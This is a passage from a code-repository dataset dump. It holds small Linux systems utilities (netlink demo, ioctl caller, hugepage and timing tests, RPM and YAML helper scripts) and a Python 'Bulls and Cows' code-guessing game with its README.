"text": "#include <time.h>\n#include <stdlib.h>\n \n#include <iostream>\n \nlong long getCurrentTimeMCS()\n{\n timespec t = { 0 };\n clock_gettime( CLOCK_REALTIME, &t );\n return static_cast<long long>(t.tv_sec) * static_cast<long long>(1000000)\n + static_cast<long long>(t.tv_nsec) / 1000;\n}\n \ntemplate<typename T>\nstruct sss\n{\n volatile T t1_;\n volatile T t2_;\n};\n \ntemplate<typename T>\nlong long do_loop( T number_of_iterations )\n{\n long long start = getCurrentTimeMCS();\n \n volatile sss<T> s;\n for ( T i = 0; i < number_of_iterations; ++i )\n {\n s.t1_ = s.t2_;\n s.t2_ = s.t1_;\n s.t1_ = s.t2_;\n s.t2_ = s.t1_;\n s.t1_ = s.t2_;\n s.t2_ = s.t1_;\n s.t1_ = s.t2_;\n s.t2_ = s.t1_;\n }\n \n return getCurrentTimeMCS() - start;\n}\n \nlong long do_loop_time( int number_of_iterations )\n{\n long long start = getCurrentTimeMCS();\n \n for ( int i = 0; i < number_of_iterations; ++i )\n {\n getCurrentTimeMCS();\n }\n \n return getCurrentTimeMCS() - start;\n}\n \nint main( int argc, char* argv[] )\n{\n if ( 1 == argc )\n {\n std::cout << \"usage: perf_32_64 [number_of_iterations]\" << std::endl;\n return 127;\n }\n \n int const number_of_iterations = ::atol( argv[1] );\n \n long time1 = do_loop<int>( number_of_iterations );\n long time2 = do_loop<size_t>( number_of_iterations );\n long time3 = do_loop<double>( number_of_iterations );\n long time4 = do_loop_time( number_of_iterations );\n \n std::cout << \"number of iterations: \" << number_of_iterations << std::endl\n << \"do_loop<int>: \" << time1 << \"mcs \" << sizeof( sss<int>) << std::endl\n << \"do_loop<size_t>: \" << time2 << \"mcs \" << sizeof( sss<size_t>) << std::endl\n << \"do_loop<double>: \" << time3 << \"mcs \" << sizeof( sss<double>) << std::endl\n << \"do_loop get_time: \" << time4 << \"mcs \" << std::endl\n ;\n \n}\n\n"
},
{
"alpha_fraction": 0.6652059555053711,
"alphanum_fraction": 0.6765995025634766,
"avg_line_length": 19.745454788208008,
"blob_id": "3f40dcaa1707db9647a4897c83b8987b56c5c531",
"content_id": "bfc7b572125e5be52437e960a3eecdc7e702b35d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1141,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 55,
"path": "/nl_send_recv/nl_receive_test.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "/* \t\n\tNetlink example that receives feedback from the kernel. \n\tError handling was skipped in order to reduce code length.\n\n\tCopyright Dominic Duval <[email protected]> according to the terms\n of the GNU Public License.\n\n*/\n\n#include <unistd.h>\n#include <stdio.h>\n#include <netinet/in.h>\n#include <sys/socket.h>\n#include <asm/types.h>\n#include <linux/netlink.h>\n#include <linux/rtnetlink.h>\n\n#define MAX_PAYLOAD 1024\n#define NL_EXAMPLE 19\n#define NL_GROUP 1\n\nint read_event(int sock)\n{\n\tint ret;\n\tstruct nlmsghdr *nlh;\n\n\tnlh = (struct nlmsghdr *) malloc(NLMSG_LENGTH(MAX_PAYLOAD));\n\tmemset(nlh, 0, NLMSG_LENGTH(MAX_PAYLOAD));\n\tret = recv(sock, (void *) nlh, NLMSG_LENGTH(MAX_PAYLOAD), 0);\n\n\tprintf(\"Message size: %d , Message: %s\\n\", ret, NLMSG_DATA(nlh));\n\n\treturn 0;\n}\n\nint main(int argc, char *argv[])\n{\n\tstruct sockaddr_nl addr;\n\tint nls;\n\n\n\t/* Set up the netlink socket */\n\tnls = socket(AF_NETLINK, SOCK_RAW, NL_EXAMPLE);\n\n\tmemset((void *) &addr, 0, sizeof(addr));\n\taddr.nl_family = AF_NETLINK;\n\taddr.nl_pid = getpid();\n\taddr.nl_groups = NL_GROUP;\n\tbind(nls, (struct sockaddr *) &addr, sizeof(addr));\n\n\twhile (1)\n\t\tread_event(nls);\n\n\treturn 0;\n}\n"
},
{
"alpha_fraction": 0.6072607040405273,
"alphanum_fraction": 0.6204620599746704,
"avg_line_length": 19.200000762939453,
"blob_id": "665d8d2348352a91a648a464cf820a03103078c5",
"content_id": "92c114ca2fb57b449462d74578356b92610af3d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 303,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 15,
"path": "/ioctler.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <sys/ioctl.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/fcntl.h>\n\nint main(int argc, char *argv[]) {\n\n\tint myioctl = 0;\n\tint myfd;\n\tsscanf (argv[2], \"%d\", &myioctl);\n\tmyfd=open(argv[1],O_RDWR);\n printf(\"%u\\n\",ioctl(myfd, myioctl, NULL));\n\treturn 0;\n}\n"
},
{
"alpha_fraction": 0.5438950657844543,
"alphanum_fraction": 0.5741674900054932,
"avg_line_length": 21,
"blob_id": "53dea3f6163cfdbf0e941c9bddaaddde0d64b9a8",
"content_id": "9e40e2da8ba4e807bc92acba5d25e81e5bae22f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 991,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 45,
"path": "/python/sortrpmlistbyversion.py",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\n# Copyright Dominic Duval <[email protected]> according to the terms\n# of the GNU Public License.\n\nimport rpm\nimport sys\n\nhave_miscutils = 0\ntry:\n from rpmUtils.miscutils import stringToVersion\n have_miscutils = 1\nexcept:\n pass\n\n\ndef rpmvercmp(rpm1, rpm2):\n (e1, v1, r1) = stringToVersion(rpm1)\n (e2, v2, r2) = stringToVersion(rpm2)\n if e1 is not None: e1 = str(e1)\n if e2 is not None: e2 = str(e2) \n rc = rpm.labelCompare((e1, v1, r1), (e2, v2, r2)) \n return rc\n\ndef usage():\n print \"\"\"\nsortrpmlistbyversion.py <file_containing_package_list>\n\"\"\"\n\ndef main():\n if len(sys.argv) > 1 and sys.argv[1] in ['-h', '--help', '-help', '--usage']:\n usage()\n sys.exit(0)\n elif len(sys.argv) == 2:\n file = open(sys.argv[1], \"r\")\n lines = file.readlines()\n lines.sort(rpmvercmp)\n for line in lines:\n sys.stdout.write( line )\n file.close()\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n\n"
},
{
"alpha_fraction": 0.647398829460144,
"alphanum_fraction": 0.647398829460144,
"avg_line_length": 18.11111068725586,
"blob_id": "9b3d9801bbc2052d7cfca6724cb32a61fb9b457e",
"content_id": "015397c37c4b3132692a1348daf2a6854af4ff9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 9,
"path": "/nl_send_recv/Makefile",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "obj-m += nl_sender.o\n\ndefault:\n\nall:\n\tmake -C/lib/modules/`uname -r`/build M=$$PWD\n\tgcc -o nl_receive_test nl_receive_test.c\nclean:\n\trm -f *.o *.ko *.mod.c nl_receive_test\n\n"
},
{
"alpha_fraction": 0.47831887006759644,
"alphanum_fraction": 0.49899932742118835,
"avg_line_length": 23.177419662475586,
"blob_id": "6695e6c93997e7d12bef8d95f2577a23d372ef56",
"content_id": "849c248f64571677bd278d5ee75fa909668b4c90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1499,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 62,
"path": "/hugepagepool.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#include <stdlib.h>\n#include <stdio.h>\n#include <unistd.h>\n#include <sys/ipc.h>\n#include <sys/shm.h>\n\n#define MB (1024 * 1024)\n\nint main (int argc, char *argv[])\n{\n int shmid, rc = 0;\n char *addr;\n unsigned long j, size = 16 * MB;\n\n if (argc > 1)\n size = atoi (argv[1]) * MB;\n\n if ((shmid = shmget (IPC_PRIVATE, size,\n 0666 | SHM_HUGETLB | IPC_CREAT)) < 0) {\n fprintf (stderr, \"Failed in shmget\");\n rc = -1;\n goto out;\n exit (-1);\n }\n\n if ((addr = shmat (shmid, (void *)0, 0))\n == (char *)-1) {\n fprintf (stderr, \"Failed to attach to shared memory\");\n rc = -1;\n goto out;\n }\n printf (\"\\nshmid %d attached at address= %p\\n\", shmid, addr);\n\n /* fill up the region */\n\n for (j = 0; j < size; j++)\n *(addr + j) = (char)j;\n printf (\"\\nOK, we packed up to %ld with integers\\n\", size);\n\n printf (\"\\nPausing 5 seconds so you can see if paegs are being used\\n\");\n sleep (30);\n\n /* check the values */\n for (j = 0; j < size; j++)\n if (*(addr + j) != (char)j) {\n printf (\"Something wrong with value at %ld\\n\", j);\n rc = -1;\n goto out;\n }\n\n printf (\"\\nOK, we checked the values, and they were OK up to %ld\\n\", j);\n\n if (shmdt ((const void *)addr)) {\n fprintf (stderr, \"Failure to detach shared memory\\n\");\n rc = -1;\n goto out;\n }\n\n out:\n shmctl (shmid, IPC_RMID, NULL);\n exit (rc);\n}\n"
},
{
"alpha_fraction": 0.3890489935874939,
"alphanum_fraction": 0.39769452810287476,
"avg_line_length": 30.454545974731445,
"blob_id": "9f1769156af13a41fa000a73df8220c7e8757492",
"content_id": "73df6eb0f97aaf8af3c3550d01ffdf7fb7cdb817",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 694,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 22,
"path": "/time.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <sys/time.h>\n\nint main (int argc, char *argv[])\n{\n struct timeval t, old, delta;\n\n while (1) {\n usleep(4000);\n gettimeofday(&t, NULL);\n if (old.tv_sec > t.tv_sec) {\n delta.tv_sec = t.tv_sec - old.tv_sec;\n delta.tv_usec = t.tv_usec - old.tv_usec;\n printf(\"Delta time: %ld %ld\\n\", delta.tv_sec,\n delta.tv_usec);\n \tprintf(\"%ld %ld\\n\", t.tv_sec, t.tv_usec);\n \tprintf(\"%ld %ld\\n\", old.tv_sec, old.tv_usec);\n }\n old = t;\n }\n return 0;\n}\n\n\n"
},
{
"alpha_fraction": 0.6796537041664124,
"alphanum_fraction": 0.6926407217979431,
"avg_line_length": 22.100000381469727,
"blob_id": "849e76e76e4fb8fd3de7f5e31fd1cb06a52aa86f",
"content_id": "324d0557523fb843a16b4b56fb8eaf559234e8d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1155,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 50,
"path": "/nl_send_recv/nl_sender.c",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "/* \t\n\tNetlink demo that sends a message from kernel space to user space.\n\n\tCopyright Dominic Duval <[email protected]> according to the terms\n of the GNU Public License.\n\n*/\n\n#include <linux/kernel.h>\n#include <linux/module.h>\n#include <net/sock.h>\n#include <linux/netlink.h>\n\n#define MAX_PAYLOAD 1024\n#define NL_EXAMPLE 19\n#define NL_GROUP 1\n#define NETLINK_MESSAGE \"This message originated from the kernel!\"\n\nstruct sock *nl_sk = NULL;\n\n\nstatic int __init init_mod(void)\n{\n\tstruct sk_buff *skb = NULL;\n\tstruct nlmsghdr *nlh;\n\n\tnl_sk = netlink_kernel_create(NL_EXAMPLE, NULL);\n\n\tif (nl_sk == 0)\n\t\treturn -1;\n\n\tskb = alloc_skb(NLMSG_SPACE(MAX_PAYLOAD), GFP_KERNEL);\n\tnlh = (struct nlmsghdr *) skb_put(skb, NLMSG_SPACE(MAX_PAYLOAD));\n\tnlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);\n\tnlh->nlmsg_pid = 0;\n\tnlh->nlmsg_flags = 0;\n\tstrcpy(NLMSG_DATA(nlh), NETLINK_MESSAGE);\n\tNETLINK_CB(skb).pid = 0;\n\tNETLINK_CB(skb).dst_pid = 0;\n\tNETLINK_CB(skb).dst_groups = NL_GROUP;\n\n\tnetlink_broadcast(nl_sk, skb, 0, NL_GROUP, GFP_KERNEL);\n\tsock_release(nl_sk->sk_socket);\n\n\treturn -1;\t\t// Always remove module immediately after loading\n}\n\nmodule_init(init_mod);\n\nMODULE_LICENSE(\"GPL\");\n"
},
{
"alpha_fraction": 0.6096451282501221,
"alphanum_fraction": 0.6187443137168884,
"avg_line_length": 20.54901885986328,
"blob_id": "d0b01770810e6905ed71e7ddf277701cae98a149",
"content_id": "5f104ce2a2e91451234483b464e7aa85ca78a36f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1099,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 51,
"path": "/python/packageconfig.py",
"repo_name": "dduval/userspacecode",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\n\"\"\" Sync YAML config file for package list configuration \n\npackageconfig.py <DIR>\n\n\"\"\"\n \nimport yaml\nimport sys\nimport os\n\n# Print usage message and exit\ndef usage():\n sys.stdout = sys.stderr\n print __doc__\n sys.exit(2)\n\n# Dump package directory entries to packages.yml\ndef dirtoyaml(dir):\n\n dirlist=[]\n dircontent = os.listdir(dir)\n if verbose > 1: print 'Directory content:' , dircontent\n\n for entry in dircontent:\n if os.path.isdir(dir + '/' + entry):\n dirlist.append(entry)\n\n if verbose > 1: print 'Directories found:' , dirlist\n yamlfile=open(dir + '/packages.yml', 'w')\n yaml.dump(dirlist, yamlfile)\n return len(dirlist) \n\ndef loadpackages(dir):\n dirlist=[]\n yamlfile=open(dir + '/packages.yml', 'r')\n dirlist= yaml.load(yamlfile)\n return dirlist\n\n\ndef main(args):\n if verbose > 1 : print \"main arguments:\" , args\n if args[0] == 'load':\n print loadpackages(args[1])\n elif args[0] == 'dump':\n dirtoyaml(args[1])\n\nif __name__ == \"__main__\":\n verbose=1\n main(sys.argv[1:])\n"
}
] | 11 |
Khagar/Project-DBSCAN | https://github.com/Khagar/Project-DBSCAN | 47334e2bf5c74c2fbaf16a94f1ec7d2997a6c7ee | 4b60a5611a0f9abccff94b9f61ac107736e07fed | 4d18aaf7bbb7cc48de523f0827dc20e54ac0316c | refs/heads/master | 2021-01-20T06:20:23.265312 | 2018-12-14T11:37:20 | 2018-12-14T11:37:20 | 89,848,492 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6117084622383118,
"alphanum_fraction": 0.6493428945541382,
"avg_line_length": 36.22222137451172,
"blob_id": "b0b561e8028fab26d78aa43a4d8a653adeca041a",
"content_id": "98c51ba363d7edbe80f8593217c9caf7579bb716",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1674,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 45,
"path": "/dbscan_self_implementation_tests.py",
"repo_name": "Khagar/Project-DBSCAN",
"src_encoding": "UTF-8",
"text": "import unittest\nimport numpy as np\n\n\ndef _distance(M,p,q):\n return np.math.sqrt(np.math.pow((M[p,0]-M[q,0]),2)+np.math.pow((M[p,1]-M[q,1]),2)) #obliczanie dystansu miedzy punktami\n\ndef _eps_neighborhood(M,p,q,eps):\n if _distance(M,p,q)==0: #zwraca false przy dystansie miedzy jednakowymi punktami np 1 i 1\n return False\n return _distance(M,p,q) < eps #jesli dystans miedzy punktami jest mniejszy niz eps to zwraca true\n\ndef _cluster(M,point,eps): #zwraca punkty dla ktorych dystans z punktu point jest mniejszy od eps\n seeds=[]\n for i in range(0, M.shape[0]):\n if _eps_neighborhood(M,point,i,eps):\n seeds.append(i)\n return seeds\n\n\nclass TestDBSCANMethods(unittest.TestCase):\n \"\"\"\n Przetestowanie funkcji uzytych w algorytmie DBSCAN. Sam algorytm DBSCAN nie zostaje przetestowany poniewaz zwraca on wykres ze stworzonymi clusterami.\n Porownanie algorytmu DBSCAN stworzonego przez nas z algorytmem DBSCAN w bibliotece scikit-learn zostanie przeprowadzone graficznie.\n \"\"\"\n def test_distance(self):\n test = _distance(np.matrix('1 1;4 5'), 0, 1)\n self.assertEquals(test, 5, 'Blad')\n\n def test_eps_neighborhood(self):\n test2 = _eps_neighborhood(np.matrix('1 1;4 5'), 0, 1, 6)\n test3 = _eps_neighborhood(np.matrix('1 1;4 5'), 0, 1, 3)\n self.assertTrue(test2)\n\n self.assertFalse(test3)\n\n def test_cluster(self):\n test4 = _cluster(np.matrix('1 1 ; 4 5 ; 2 2; 3 3'), 2, 20)\n test5 = _cluster(np.matrix('1 1 ; 4 5 ; 2 2; 3 3'), 2, 3)\n example = [0, 1, 3]\n self.assertListEqual(test4, example, 'Blad')\n\n\nif __name__ == '__main__':\n unittest.main()"
},
{
"alpha_fraction": 0.7223948240280151,
"alphanum_fraction": 0.7240892648696899,
"avg_line_length": 34.400001525878906,
"blob_id": "b6f9c8b105bac841129adcf44a4ebbd2bc6f07d9",
"content_id": "9d877b0968eb02a4b30cccf1668bc4da9d1636fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3633,
"license_type": "no_license",
"max_line_length": 317,
"num_lines": 100,
"path": "/README.md",
"repo_name": "Khagar/Project-DBSCAN",
"src_encoding": "UTF-8",
"text": "# Project-DBSCAN\n\n### Skład zespołu:\nKarol Jasina, \nWioleta Cieślik, \nBartłomiej Góra\n\n### Opis przesłanych plików\n\ndbscan_scikit.py - Tworzy clustery dla przykładowego układu współrzędnych za pomocą algorytmu DBSCAN z biblioteki scikit-learn.\n\ndbscan_self_implementation.py - Tworzy clustery dla przykładowego układu współrzędnych za pomocą algorytmu DBSCAN zaimplementowanego przez nas.\n\ndbscan_self_implementation_tests.py - Testy jednostkowe wykorzystanych funkcji.\n\n## Uruchomienie algorytmu\n\n\t DBSCAN(M, eps, min_points)\n\t M - macierz współrzędnych w postaci M[x y]\n\t eps - maksymalny zasięg sąsiedztwa\n\t min_points - minimalna liczba punktów znajdujących się w sąsiedztwie\n\n## Porównanie wyników\n\n### Przykładowy zbiór współrzędnych dla którego porównane zostały wyniki algorytmów:\n\n\n\n### Układ współrzędnych uzyskany za pomocą DBSCAN zaimplementowanego przez nas:\n\n\n\n### Układ współrzędnych uzyskany za pomocą DBSCAN z scikit-learn:\n\n\n\n### Wnioski\nPorównując oba układy możemy stwierdzić, że wyniki uzyskane za pomocą DBSCAN zaimplementowanego przez nas są niemal identyczne co wyniki algorytmu z biblioteki scikit-learn 4 punkty nie zostały zakwalifikowane do żadnego z clusterow w przypadku naszego algorytmu, natomiast DBSCAN z scikit-learna zakwalifikował je. \nCzas wykonywania różni się za to drastycznie. Nasza implementacja wykonuje się dość długo (około 3 min) natomiast implementacja z scikit-learna wykonuje się niemal natychmiastowo.\n\t\n## Dokumentacja\n\n\tdbscan_self_implementation.distance(M, p, q)\n\t\n\tFunkcja oblicza dystans miedzy dwoma danymi punktami p i q pobierajac wspolrzedne tych punktow z macierzy M\n\n\tParameters:\t\n\tM – Macierz odleglosci miedzy punktami\n\tp – Pierwszy punkt\n\tq – Drugi punkt\n\t\n\tReturns:\t\n\tdystans miedzy dwoma punktami\n\n-----------------------------------------------------------------------------------------------------\n\n\tdbscan_self_implementation.eps_neighborhood(M, p, q, eps)\n\n\tFunkcja sprawdza czy dystans miedzy wybranymi punktami jest mniejszy od podanej liczby eps\n\n\tParameters:\t\n\tM – Macierz odleglosci miedzy punktami\n\tp – Pierwszy punkt\n\tq – Drugi punkt\n\teps – maksymalny zasieg sasiedztwa\n\t\n\tReturn True:\t\n\tw przypadku gdy dystans jest mniejszy do eps\n\tReturn False:\t\n\tw przypadku gdy dystans jest wiekszy od eps\n\n-----------------------------------------------------------------------------------------------------\n\n\tdbscan_self_implementation.cluster(M, point, eps)\n\t\n\tFunkcja zwraca tablice z wszystkimi punktami 'i' ktore znajduja sie w sasiedztwie punktu point\n\n\tParameters:\n\tM – Macierz odleglosci miedzy punktami\n\tpoint – Punkt dla ktorego szukamy punktow w sasiedztwie\n\teps – Maksymalny zasieg sasiedztwa\n\t\n\tReturn seeds:\t\n\tzwraca tablice seeds z punktami znajdujacymi sie w sasiedztwie punktu point\n\n-----------------------------------------------------------------------------------------------------\n\n\tdbscan_self_implementation.DBSCAN(M, eps, min_points)\n\n\tFunkcja uzywajac algorytmu DBSCAN przedstawia na wykresie wszystkie stworzone clustery\n\n\tParameters:\t\n\tM – Macierz odleglosci miedzy punktami\n\teps – Maksymalny zasieg sasiedztwa\n\tmin_points – Minimalna liczba punktow aby dany punkt byl CORE punktem\n\t\n\tReturns:\t\n\tZwraca wykres przedstawiajacy wszystkie stworzone clustery.\n\tPunkty nie nalezace do zadnego z clusterow sa zaznaczone na czarno, \n\tBORDER punkty sa zaznaczone malym zakolorowanym kolem natomiast CORE punkty duzym zakolorwanym kolem\n\n"
},
{
"alpha_fraction": 0.624477744102478,
"alphanum_fraction": 0.6352716088294983,
"avg_line_length": 46.875,
"blob_id": "0c19d6e28c1ff0c17008cac8cf733a9781789a9a",
"content_id": "4124a6dd622cde71ae25e91cad5e2347473f0962",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5744,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 120,
"path": "/dbscan_self_implementation.py",
"repo_name": "Khagar/Project-DBSCAN",
"src_encoding": "UTF-8",
"text": "from sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.preprocessing import StandardScaler\nfrom pylab import *\n\n\ndef distance(M, p, q):\n \"\"\"\n Funkcja oblicza dystans miedzy dwoma danymi punktami p i q pobierajac wspolrzedne tych punktow z macierzy M\n\n :param M: Macierz odleglosci miedzy punktami\n :param p: Pierwszy punkt\n :param q: Drugi punkt\n\n :return: dystans miedzy dwoma punktami\n \"\"\"\n\n return (math.sqrt(math.pow(M[p, 0] - M[q, 0],2) + math.pow(M[p, 1] - M[q, 1],2))) # obliczanie dystansu miedzy punktami\n\n\ndef eps_neighborhood(M, p, q, eps):\n \"\"\"\n Funkcja sprawdza czy dystans miedzy wybranymi punktami jest mniejszy od podanej liczby eps\n\n :param M: Macierz odleglosci miedzy punktami\n :param p: Pierwszy punkt\n :param q: drugi punkt\n :param eps: maksymalny zasieg sasiedztwa\n\n :return True: w przypadku gdy dystans jest mniejszy do eps\n :return False: w przypadku gdy dystans jest wiekszy od eps\n \"\"\"\n if distance(M, p, q) == 0: # zwraca false przy dystansie miedzy jednakowymi punktami np 1 i 1\n return False\n return distance(M, p, q) < eps # jesli dystans miedzy punktami jest mniejszy niz eps to zwraca true\n\n\ndef cluster(M, point, eps): # zwraca punkty dla ktorych dystans z punktu point jest mniejszy od eps\n\n \"\"\"\n Funkcja zwraca tablice z wszystkimi punktami i ktore znajduja sie w sasiedztwie punktu point\n\n :param M: Macierz odleglosci miedzy punktami\n :param point: punkt dla ktorego szukamy punktow w sasiedztwie\n :param eps: maksymalny zasieg sasiedztwa\n :return seeds: zwraca tablice seeds z punktami znajdujacymi sie w sasiedztwie punktu point\n \"\"\"\n seeds = []\n for i in range(0, M.shape[0]):\n if eps_neighborhood(M, point, i, eps):\n seeds.append(i)\n return seeds\n\n\ndef DBSCAN(M, eps, min_points):\n \"\"\"\n Funkcja uzywajac algorytmu DBSCAN przedstawia na wykresie wszystkie stworzone clustery\n\n :param M: Macierz odleglosci miedzy punktami\n :param eps: maksymalny zasieg sasiedztwa\n :param min_points: Minimalna liczba punktow aby dany punkt byl CORE punktem\n\n :return: Zwraca wykres przedstawiajacy wszystkie stworzone clustery. Punkty nie nalezace do zadnego z clusterow sa zaznaczone na czarno, BORDER punkty sa zaznaczone malym zakolorowanym kolem natomiast CORE punkty duzym zakolorwanym kolem\n \"\"\"\n colors = ['r', 'g', 'b', 'y', 'c', 'm'] # tablica kolorow - inny kolor dla kazdego clustera\n checked = np.zeros(M.shape[\n 0]) # tablica sprawdzonych punktow wypelniona zerami jesli punkt zostal sprawdzony zmieniana jest wartosc na 1print(checked)\n classification = np.empty(M.shape[0])\n classification.fill(0)\n cluster_count = 0\n for i in range(0, len(colors)): # for odpowiedzialny do tworzenia clusterow (kazdy cluster inny kolor)\n for j in range(0, len(checked)): # szukanie pierwszego niesprawdzonego punktu\n if checked[j] != 1:\n seeds = cluster(M, j, eps)\n startpoint = j\n if min_points > len(seeds):\n checked[\n startpoint] = 1 # jesli punkt ma mniej sasiadow niz minimalna liczba to ustawia punkt jako sprawdzony i nic z nim dalej nie robi bo jest do dupy\n\n if min_points <= len(seeds):\n plt.plot(M[startpoint, 0], M[startpoint, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n markersize=np.pi * 3 ** 2) # jesli ma minimalna liczbe sasiadow to robi koleczko na wykresie\n checked[startpoint] = 1\n classification[startpoint] = i + 1\n break # jesli znaleziono niesprawdzony punkt wychodzi z petli\n while len(seeds) > 0:\n\n point = seeds[0] # wybranie za kolejny punkt pierwszego punktu z tablicy seeds\n results = cluster(M, point, eps) # zapisanie punktow ktore spelniaja warunek z neighborhood\n if checked[point] != 1:\n if min_points > len(results) and (classification[point] == 0 or classification[point] == -1):\n checked[\n point] = 1 # jesli punkt ma mniej sasiadow niz minimalna liczba to ustawia punkt jako sprawdzony i ustala go jako border\n plt.plot(M[point, 0], M[point, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n markersize=8)\n classification[point] = -(i + 1)\n if min_points <= len(results):\n plt.plot(M[point, 0], M[point, 1], 'k.', markeredgecolor='k', markerfacecolor=colors[i],\n markersize=np.pi * 3 ** 2) # jesli ma minimalna liczbe sasiadow to robi koleczko na wykresie\n checked[point] = 1\n classification[point] = i + 1\n for k in range(0, len(results)):\n result_point = results[k]\n seeds.append(\n result_point) # dodanie do tablicy seeds punktow ktore znajdowaly sie w sasiedztwie punktu point\n seeds.remove(seeds[0]) # usuwa juz sprawdzony element z tablicy seeds\n if np.sum(checked) == M.shape[\n 0]: # jesli juz wszystkie punkty zostaly sprawdzone to wychodzi z petli - po tym wszystkie clustery powinny byc zrobione\n break\n return plt.show()\n\n# Generowanie przykladowego ukladu wspolrzednych\ncenters = [[1, 1], [-1, -1], [1, -1]]\nX, labels_true = make_blobs(n_samples=750, centers=centers, cluster_std=0.4, random_state=0)\nX = StandardScaler().fit_transform(X)\n\n\nx, y = zip(*X)\nplt.scatter(x, y, s=5, color='black')\n\nDBSCAN(X,0.3,10)"
}
] | 3 |
hadenodom/Bulls-and-Cows | https://github.com/hadenodom/Bulls-and-Cows | 042352180e9dc645366c383bb66fd4d92dfd04c8 | c79357fe935f26af6848d43971611a2d819dcb86 | 379d818c092bed42f50166f293e53bb5a6c55ffb | refs/heads/master | 2020-12-03T02:26:39.632269 | 2019-01-30T03:53:15 | 2019-01-30T03:53:15 | 95,939,398 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7433476448059082,
"alphanum_fraction": 0.760515034198761,
"avg_line_length": 54.380950927734375,
"blob_id": "14c05acf9b705d57d86e789a3e1ad0df5dd0c748",
"content_id": "b6ffc48e181ffaf746dc5c93f6cd3e9b1beea309",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1165,
"license_type": "permissive",
"max_line_length": 283,
"num_lines": 21,
"path": "/README.md",
"repo_name": "hadenodom/Bulls-and-Cows",
"src_encoding": "UTF-8",
"text": "# Bulls and Cows\n\nAlso known as Mastermind, this is a classic game in which one attempts to guess a 4-digit code. With every guess, one is told how many digits they guessed correctly and in the right place, and how many digits they guessed correctly, but got in the wrong place. \n\nExample: Let's assume the correct code is 1234. If you guess 1256, you will get the following response:\n\n> Number of digits in the right place: 2\n>\n> Number of digits guessed correctly but in the wrong place: 0\n\nIf you guess 1243, you will get:\n\n> Number of digits in the right place: 2\n>\n> Number of digits guessed correctly but in the wrong place: 2\n\nMost implementations of this game simply tell you that you got \"2 bulls and 2 cows\"; however, I wanted this game to be playable without having read the manual or having any knowledge about the game, so it uses more natural language such as \"Number of digits in the right place\", etc.\n\n### As of July 1, this game is now available in the Arch Linux AUR (Arch User Repository)! \n\nUsers of Arch Linux may use their favorite AUR helper to install the game from the AUR, or manually install it using the AUR build script there. \n"
},
{
"alpha_fraction": 0.6042496562004089,
"alphanum_fraction": 0.6314740777015686,
"avg_line_length": 26.88888931274414,
"blob_id": "f38d0dd71dc12f5e8afef215bda0635ef76f727e",
"content_id": "d5a23dbbed8d0d156ba9f6800ae4e335d5d5c48d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1506,
"license_type": "permissive",
"max_line_length": 247,
"num_lines": 54,
"path": "/bullscows.py",
"repo_name": "hadenodom/Bulls-and-Cows",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\nimport random\ndef passw(numDigits):\n # Returns a string that is numDigits long, made up of unique random digits.\n numbers = list(range(10))\n random.shuffle(numbers)\n secretNum = ''\n for i in range(numDigits):\n secretNum += str(numbers[i])\n return int(secretNum)\npassw = passw(4)\n\n## parse() is a broken function as of Python3. MUSTFIX. \n#def parse(code):\n#\ta = code/1000\n#\tb = (code/100) - (a*10)\n#\tc = (code/10) - ((code/100)*10)\n#\td = code - ((code/10)*10)\n#\treturn a,b,c,d\n\non = 0\nwhile (on != 4):\n\ton = 0\n\tpresent = 0\n\tguess=int(input(\"Guess the 4-digit code:\"))\n\t# inserting str here is a hacky solution; Python3 broke expected behavior of parse() function above (disabled), and list won't accept int input, so int guess and int passwd are converted to strings and then passed to list. VERY HACKY, MUSTFIX. \n\ta,b,c,d = list(str(guess))\n\tA,B,C,D = list(str(passw))\n\twhile a==b or b==c or 